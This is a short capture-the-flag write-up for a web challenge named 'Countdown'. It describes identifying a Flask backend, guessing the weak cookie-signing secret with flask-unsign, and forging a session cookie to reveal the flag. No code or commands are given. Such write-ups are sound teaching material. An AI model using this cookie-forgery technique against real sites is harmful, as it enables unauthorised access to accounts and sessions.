5225225
58e78c7c3d
|
||
|---|---|---|
| .. | ||
| README.md | ||
README.md
Countdown
Web 455 points 63 solves
This challenge is simple. All you have to do is wait for the countdown to end to get the flag. The countdown ends one second before the end of the CTF, but you have fast fingers right?
writeup
You're sent to a website that contains a javascript countdown to a date. Above that is the phrase "Time is key.". Looking at the source code, it reads a cookie that contains 3 base64 parts joined by dots, and only makes use of the first part. Decoding the first part of the cookie gives you a JSON object describing the date the page counts down to, but changing it doesn't get the server to return the flag.
The format was similar to that of a JSON Web Token, but it couldn't be a JWT.
Intentionally making the server return a 404 by going to a non-existent page gave us
Not Found
The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.
Looking online for that string, most of the results mention Flask (https://github.com/pallets/flask), a Python web framework. So the server's probably using flask.
Searches online leads us to itsdangerous (https://itsdangerous.palletsprojects.com/en/1.1.x/), which is the library Flask uses to sign its cookies. The format looks to match, so we know it's a Flask cookie.
To break it, I used flask-unsign (https://github.com/Paradoxis/Flask-Unsign), which is a tool that can take a Flask cookie and crack the code using a wordlist. The built-in wordlist didn't crack the cookie, but then I went back and read the page, and tried both "time" and "Time" as the secret key. "Time" turned out to be the key, so I could then re-sign the cookie with a date in the past, paste that into my browser, and refresh the page, showing the flag.